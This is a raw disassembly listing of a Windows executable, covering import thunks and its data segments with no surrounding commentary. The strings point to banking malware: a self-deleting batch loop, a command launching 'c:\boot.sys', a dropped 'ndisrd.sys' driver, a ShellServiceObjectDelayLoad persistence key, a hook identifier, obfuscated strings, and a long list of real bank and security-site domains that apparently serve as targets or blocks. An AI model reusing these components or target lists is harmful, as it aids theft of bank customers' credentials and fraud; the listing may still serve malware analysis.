sub_40C8BC proc near ; CODE XREF: sub_40B01B+112�p
jmp ds:dword_4474C4
sub_40C8BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8C8 proc near ; CODE XREF: sub_40A766+4BD�p
jmp ds:dword_4474D0
sub_40C8C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8D4 proc near ; CODE XREF: sub_40B143+2DB�p
jmp ds:dword_4474D4
sub_40C8D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8E0 proc near ; CODE XREF: sub_40B143+2C2�p
; sub_40B143+2CE�p
jmp ds:dword_4474D8
sub_40C8E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8EC proc near ; CODE XREF: sub_40B143+2FA�p
jmp ds:dword_4474DC
sub_40C8EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8F8 proc near ; CODE XREF: sub_408E89+1CE�p
; sub_408E89+7D8�p
jmp ds:dword_4474E0
sub_40C8F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C904 proc near ; CODE XREF: sub_40518F+36�p
jmp ds:dword_4474EC
sub_40C904 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C910 proc near ; CODE XREF: sub_40518F+9B�p
jmp ds:dword_4474F0
sub_40C910 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C91C proc near ; CODE XREF: sub_4015EB+2E�p
; sub_404098+8�p
jmp ds:dword_4474F4
sub_40C91C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C928 proc near ; CODE XREF: sub_4014BD+7C�p
; sub_4015EB+68�p ...
jmp ds:dword_4474F8
sub_40C928 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C934 proc near ; CODE XREF: sub_4014BD+2A�p
jmp ds:dword_4474FC
sub_40C934 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C940 proc near ; CODE XREF: sub_4014BD+6A�p
jmp ds:dword_447500
sub_40C940 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C94C proc near ; CODE XREF: sub_4015EB+5E�p
; sub_4040AA+27�p
jmp ds:dword_447504
sub_40C94C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C958 proc near ; CODE XREF: sub_4022CC+138�p
jmp ds:dword_447508
sub_40C958 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C964 proc near ; CODE XREF: sub_4022CC+173�p
jmp ds:dword_44750C
sub_40C964 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C970 proc near ; CODE XREF: sub_4022CC+159�p
jmp ds:dword_447510
sub_40C970 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C97C proc near ; CODE XREF: sub_404FEF+24�p
jmp ds:dword_447514
sub_40C97C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C988 proc near ; CODE XREF: sub_404FEF+16D�p
jmp ds:dword_447518
sub_40C988 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C994 proc near ; CODE XREF: sub_404FEF+37�p
jmp ds:dword_44751C
sub_40C994 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9A0 proc near ; CODE XREF: sub_403610+40�p
jmp ds:dword_447528
sub_40C9A0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9AC proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_44752C
sub_40C9AC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9B8 proc near ; CODE XREF: sub_406A9A+1D5�p
; sub_406E2B+6C�p ...
jmp ds:dword_447530
sub_40C9B8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9C4 proc near ; CODE XREF: sub_4053A1+E5�p
; sub_4053A1+14C�p
jmp ds:dword_447534
sub_40C9C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9D0 proc near ; CODE XREF: sub_409847+D97�p
; sub_409847+DD1�p
jmp ds:dword_447538
sub_40C9D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9DC proc near ; CODE XREF: sub_401219+74�p
; sub_409847+D1D�p ...
jmp ds:dword_44753C
sub_40C9DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9E8 proc near ; CODE XREF: sub_4088D5+116�p
jmp ds:dword_447540
sub_40C9E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9F4 proc near ; CODE XREF: sub_40129C+1A�p
; .text:0040144C�p ...
jmp ds:dword_447544
sub_40C9F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA00 proc near ; CODE XREF: sub_4062CD+71�p
; sub_4062CD+236�p ...
jmp ds:dword_447548
sub_40CA00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA0C proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_44754C
sub_40CA0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA18 proc near ; CODE XREF: sub_40170F:loc_401732�p
; sub_403C5F+50�p ...
jmp ds:dword_447550
sub_40CA18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA24 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_447554
sub_40CA24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA30 proc near ; CODE XREF: sub_4037EF+2E�p
; .text:004038BB�p ...
jmp ds:dword_447558
sub_40CA30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA3C proc near ; CODE XREF: sub_409847+74�p
; sub_40A766+137�p
jmp ds:dword_44755C
sub_40CA3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA48 proc near ; CODE XREF: sub_409847+A25�p
jmp ds:dword_447560
sub_40CA48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA54 proc near ; CODE XREF: sub_403449+5D�p
; sub_4034D8+53�p ...
jmp ds:dword_447564
sub_40CA54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA60 proc near ; CODE XREF: sub_40C434+17�p
jmp ds:dword_447568
sub_40CA60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA6C proc near ; CODE XREF: sub_4062CD+4B8�p
jmp ds:dword_44756C
sub_40CA6C endp
; ---------------------------------------------------------------------------
align 800h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0002D428 ( 185384.)
; Section size in file : 0002D428 ( 185384.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 40D000h
dword_40D000 dd 72656B5Ch ; sub_4083E5+8E�r ...
aNel32_dll db 'nel32.dll',0
align 10h
db 0
aSCmd_pif db '%s\cmd.pif',0
db 0
db 2 dup(0), 5Ch
aCmd_exeCStartC db 'cmd.exe /C start c:\boot.sys',0
align 10h
dd 3F2h dup(0)
dword_40E008 dd 0 ; sub_40B01B+DF�r
dword_40E00C dd 0 ; sub_401D14+47D�w ...
dword_40E010 dd 40h dup(0) ; sub_409847+6DA�o ...
dword_40E110 dd 0 ; sub_40357C:loc_403606�r
dd 455h dup(0)
dword_40F268 dd 0 ; sub_401D14+23D�w ...
dword_40F26C dd 0 ; sub_401D14+412�r ...
dword_40F270 dd 0 ; sub_406E2B+FF8�r ...
byte_40F274 db 0 ; DATA XREF: sub_401D14+14F�w
align 10h
dword_40F280 dd 40h dup(0) ; sub_40A766+3BC�o ...
dword_40F380 dd 0 ; sub_402A4D+E5�w ...
dd 0FFh dup(0)
dword_40F780 dd 0 ; sub_40375C+89�r
dd 431h dup(0)
dword_410848 dd 0 ; sub_408E89+816�r ...
align 10h
dword_410850 dd 0 ; .text:loc_401B90�r
dd 457h dup(0)
dword_4119B0 dd 0 dd 0FFh dup(0)
dword_411DB0 dd 785C7325h ; sub_4040FC:loc_40418A�r
aSlfdlnt_bat db 'slfdlnt.bat',0
dd 0
aSCmd_pif_0 db '%s\cmd.pif',0
align 10h
dd 5C000000h, 2E646D63h, 657865h, 0
aLoop@delSNul@i db ':loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah
db '@if exist %s goto loop',0Dh,0Ah
db '@del %s>nul',0Dh,0Ah,0
align 4
dd 73250000h, 20432F20h, 7325h, 3EEh dup(0)
dword_412DE0 dd 0 ; .text:loc_402568�r
dd 462h dup(0)
dword_413F6C dd 0 ; sub_40B01B+F8�r
dword_413F70 dd 0 ; sub_408E89+854�r ...
align 8
byte_413F78 db 0 ; DATA XREF: sub_401D14+41A�w
align 10h
byte_413F80 db 0 ; DATA XREF: sub_401D14+6C�w
; sub_401D14+71�r ...
align 4
dword_413F84 dd 0 ; sub_401D14+1E7�w ...
align 10h
dword_413F90 dd 40h dup(0) ; sub_409847+969�o ...
dword_414090 dd 0 ; sub_402A4D+D9�r ...
dd 0FFh dup(0)
dword_414490 dd 0 ; sub_4080E0+9F�r
dd 45Bh dup(0)
dword_415600 dd 0 ; .text:00401957�r
dword_415604 dd 423h dup(0)
dword_416690 dd 0 ; sub_4045EF:loc_404659�r
dd 3EBh dup(0)
dword_417640 dd 0 ; .text:00402232�r
dword_417644 dd 40Bh dup(0)
dword_418670 dd 94h ; sub_40A766+EC�o
dd 5, 1, 0A28h
dword_418680 dd 2 aServicePack2 db 'Service Pack 2',0
align 4
dd 1Fh dup(0)
dword_418710 dd 0 ; sub_405254+91�r
dd 3F3h dup(0)
dword_4196E0 dd 0 ; .text:004014B3�r
dd 45Eh dup(0)
byte_41A85C db 0 ; DATA XREF: sub_401D14+3DC�w
; sub_401D14+3E1�r
align 10h
dword_41A860 dd 0 ; sub_401D14+F6�r ...
dword_41A864 dd 0 dword_41A868 dd 0 ; sub_4022CC+114�r ...
align 10h
dword_41A870 dd 6972645Ch ; sub_40129C:loc_40132A�r
aVersNdisrd_sys db 'vers\ndisrd.sys',0
align 8
aEnabledsf db 'enabledsf',0
align 4
dd 73250000h, 2E73255Ch, 657865h, 3FFh dup(0)
dword_41B89C dd 0 ; sub_40A766+84C�r ...
dword_41B8A0 dd 0 ; sub_4068A2:loc_406924�r
dd 42Ah dup(0)
dword_41C94C dd 0 ; sub_408E89+1E8�r
dword_41C950 dd 0 ; sub_408E89+52�r ...
dword_41C954 dd 0 ; sub_4024C1+D�r
align 10h
dword_41C960 dd 463Ah ; sub_4032E7+92�r
dd 443h dup(0)
dword_41DA70 dd 0 ; sub_401D14:loc_401DB1�w ...
dword_41DA74 dd 0 ; sub_408E89+723�r ...
dword_41DA78 dd 0 ; sub_40B01B+C5�r
dword_41DA7C dd 0 ; sub_408E89+367�r ...
dword_41DA80 dd 0 ; sub_402465+4C�r
dword_41DA84 dd 400000h ; sub_408E89+DB�r ...
dword_41DA88 dd 0 ; sub_401D14+CD�w ...
align 10h
dword_41DA90 dd 3430257Bh ; sub_403936:loc_4039CC�r
aX04x04x04x04x0 db 'X%04X-%04X-%04X-%04X-%04X%04X%04X}',0
align 4
dd 0
dd 25000000h, 583830h, 2 dup(0)
aSS_dll db '%s\%s.dll',0
align 4
dd 0
dd 4C430000h, 5C444953h, 495C7325h, 6F72506Eh, 72655363h
dd 33726576h, 32h, 0
dd 68540000h, 64616572h, 4D676E69h, 6C65646Fh, 2 dup(0)
dd 61704100h, 656D7472h, 746Eh, 0
db 0
db 2 dup(0), 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayL'
db 'oad',0
align 10h
dd 3C3h dup(0)
dword_41EA7C dd 0 ; sub_40B01B+B1�r
dword_41EA80 dd 40h dup(0) ; sub_40A766+387�o ...
byte_41EB80 db 0 ; DATA XREF: sub_401D14+19B�w
align 4
dword_41EB84 dd 0 ; sub_408E89+E3�r ...
align 10h
byte_41EB90 db 0 ; DATA XREF: sub_406E2B+199�o
; sub_406E2B+CD4�o ...
byte_41EB91 db 0 ; DATA XREF: sub_406E2B+E7D�r
byte_41EB92 db 0 ; DATA XREF: sub_406E2B+E86�r
byte_41EB93 db 0 ; DATA XREF: sub_406E2B+E8F�r
dd 1828h dup(0)
db 2 dup(0)
word_424C36 dw 0 ; DATA XREF: .data:off_4412E2�o
dword_424C38 dd 27D6h dup(0)
byte_42EB90 db 0 ; DATA XREF: sub_401D14+289�w
; sub_401D14+28E�r
align 4
dword_42EB94 dd 0 ; .text:0040809F�r ...
align 10h
dword_42EBA0 dd 0 ; .text:loc_4017FC�r
dd 453h dup(0)
dword_42FCF0 dd 0 dword_42FCF4 dd 0 ; sub_4022CC+36�r
dword_42FCF8 dd 0 ; sub_408E89+20E�r ...
byte_42FCFC db 0 ; DATA XREF: sub_401D14+315�w
; sub_401D14+31F�r ...
align 10h
dword_42FD00 dd 0 ; .text:loc_40451D�r
dd 3FBh dup(0)
dword_430CF0 dd 0 ; sub_406D88:loc_406E21�r
dd 402h dup(0)
dword_431CFC dd 0 ; sub_408E89+836�r ...
dword_431D00 dd 0 ; sub_40B143+28B�r ...
dword_431D04 dd 0 ; sub_408E89+325�r ...
align 10h
dword_431D10 dd 0 ; .text:004087B9�r
dd 43Bh dup(0)
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_403AA3+7F�o
; sub_403C5F+25C�o ...
dd 3Bh dup(0)
byte_432F00 db 0 ; DATA XREF: sub_401334+AA�o
; sub_408189+F1�w ...
align 4
dd 3Fh dup(0)
dword_433000 dd 0 ; .text:loc_401A2C�r
dd 3F8h dup(0)
dword_433FE4 dd 0 ; sub_408E89+878�r ...
dword_433FE8 dd 0 ; sub_408E89+89B�r
align 10h
dword_433FF0 dd 0 ; .text:004015E1�r
dd 196h dup(0)
dword_43464C dd 27Dh dup(0) dword_435040 dd 0 ; sub_404F4F+96�r
dd 437h dup(0)
dword_436120 dd 0 ; .text:00401D0A�r
dd 41Bh dup(0)
dword_437190 dd 0 ; .text:00401705�r
dd 423h dup(0)
dword_438220 dd 0 ; .text:loc_408A8B�r
dd 441h dup(0)
dword_439328 dd 0 ; sub_40B143+293�r ...
align 10h
byte_439330 db 0 ; DATA XREF: sub_401D14+458�w
align 10h
dword_439340 dd 0 ; .text:0040889B�r
dd 439h dup(0)
_bss ends
; Section 3. (virtual address 0003B000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0003B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43B000h
dd offset dword_40D000
dd 43A428h, 8000h, 0
dword_43B010 dd 0 ; sub_40109A+110�w ...
dword_43B014 dd 12FF74h dd 0
dword_43B01C dd 0 dword_43B020 dd 1 ; sub_401219+5A�r
dword_43B024 dd 14A4E0h ; sub_401219+54�r
dword_43B028 dd 1471D8h ; sub_401219+4E�r
dword_43B02C dd 0 ; sub_40109A:loc_401208�r
dword_43B030 dd 0 dword_43B034 dd 0 ; sub_40109A+87�r ...
dword_43B038 dd 0 dword_43B03C dd 14h dup(0) ; sub_40109A+8F�o
dword_43B08C dd 0 dword_43B090 dd 0 ; sub_40109A+32�w
dword_43B094 dd 2 ; sub_408E89+1C5�r ...
dword_43B098 dd 0Ch ; sub_408DEF+5B�r ...
dword_43B09C dd 34h ; sub_40129C:loc_4012C2�r ...
aKkqhook_28 db 'KKQHOOK_28',0 ; DATA XREF: sub_40A704+19�o
; sub_40A766+51F�o
align 4
dd 372E3D00h, 0
dword_43B0B4 dd 0 ; sub_409847+17C�r ...
dword_43B0B8 dd 46h ; sub_409847+DF7�r ...
off_43B0BC dd offset aSiliconfirewar ; DATA XREF: sub_409847+14A�r
; sub_409847+182�r
; "siliconfireware.ru"
dd offset aChechenpress_i ; "chechenpress.info"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aKavkazcenter_c ; "kavkazcenter.com/russ"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
db 24h, 6Ch, 0
aSoftwareMicr_0 db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_409847+599�o
; sub_409847+62D�o ...
aC9 db 'C9',27h,'/%',0
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_409847+594�o
; sub_409847+628�o
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_409847+6A3�o
; sub_409847+84D�o
align 4
dword_43B214 dd 0 ; sub_40B143:loc_40B2FA�r ...
dword_43B218 dd 0 ; sub_40B143+B3�r ...
aVk db ' vK%;',0 ; DATA XREF: sub_401334+1B�o
aByxy db 'Byxy',0 ; DATA XREF: sub_401334+E1�o
align 4
dword_43B228 dd 3Bh ; sub_401D14+B7�w ...
dd 6, 0Eh
dword_43B234 dd 0 ; .text:loc_401458�r ...
aMI5 db 'm i5',0 ; DATA XREF: sub_4014BD+C�o
a4Ec db '4%ec',0 ; DATA XREF: sub_4014BD+34�o
aXuT db 'xU t',0 ; DATA XREF: sub_4014BD+4C�o
align 4
dd 4, 0Dh
dword_43B250 dd 0 ; .text:loc_40157D�r ...
aDGu db 'D GU',0 ; DATA XREF: sub_4015EB+40�o
align 4
dd 6, 10h
dword_43B264 dd 0 ; .text:loc_4016A8�r ...
dword_43B268 dd 263Ah, 5, 0Fhdword_43B274 dd 0 ; .text:loc_40179D�r ...
dword_43B278 dd 263Ah, 6, 10hdword_43B284 dd 0 ; .text:loc_4018FA�r ...
dword_43B288 dd 7F3E4546h, 7961h, 8, 12hdword_43B298 dd 0 ; .text:loc_4019D6�r ...
byte_43B29C db 0 ; DATA XREF: sub_401A36+C�o
byte_43B29D db 0 ; DATA XREF: sub_401A36+5D�o
byte_43B29E db 0 ; DATA XREF: sub_401A36+BA�o
dword_43B29F dd 3C2053h align 4
dd 3, 0Eh
dword_43B2AC dd 0 ; .text:loc_401B46�r ...
aRrQa db 'rr/+Q',0 ; DATA XREF: sub_401B9A+29�o
align 4
dd 5, 12h
dword_43B2C0 dd 0 ; .text:loc_401CA9�r ...
aL2r6_ db 'l2r-6;.',0 ; DATA XREF: sub_401D14+95�o
byte_43B2CC db 0 ; DATA XREF: sub_401D14+A7�o
aF50z db 'F 5 0z',0 ; DATA XREF: sub_401D14+437�o
off_43B2D4 dd offset loc_401DB1 ; DATA XREF: sub_401D14+8B�r
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_401F91
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E01
dd offset loc_401E01
dd offset loc_401E36
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E36
dd offset loc_401E36
dd offset loc_401EB9
dd offset loc_401EE4
dd offset loc_401F5C
dd offset loc_401F22
dd offset loc_401E25
dd offset loc_401F10
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401F10
dd offset loc_401F22
dd offset loc_401F10
dd offset loc_401F10
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
off_43B504 dd offset loc_401DB1 ; DATA XREF: sub_401D14+2B3�r
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401F39
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E25
dd offset loc_401F5C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F10
dd offset loc_401F10
dd offset loc_401F72
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401F10
dd offset loc_401F22
dd offset loc_401F7E
dd offset loc_40200C
dd offset loc_401F72
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DD1
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401DB1
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401E25
dd offset loc_401F5C
dd offset loc_401F5C
dd offset loc_401F39
dd offset loc_401E25
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
dd offset loc_40200C
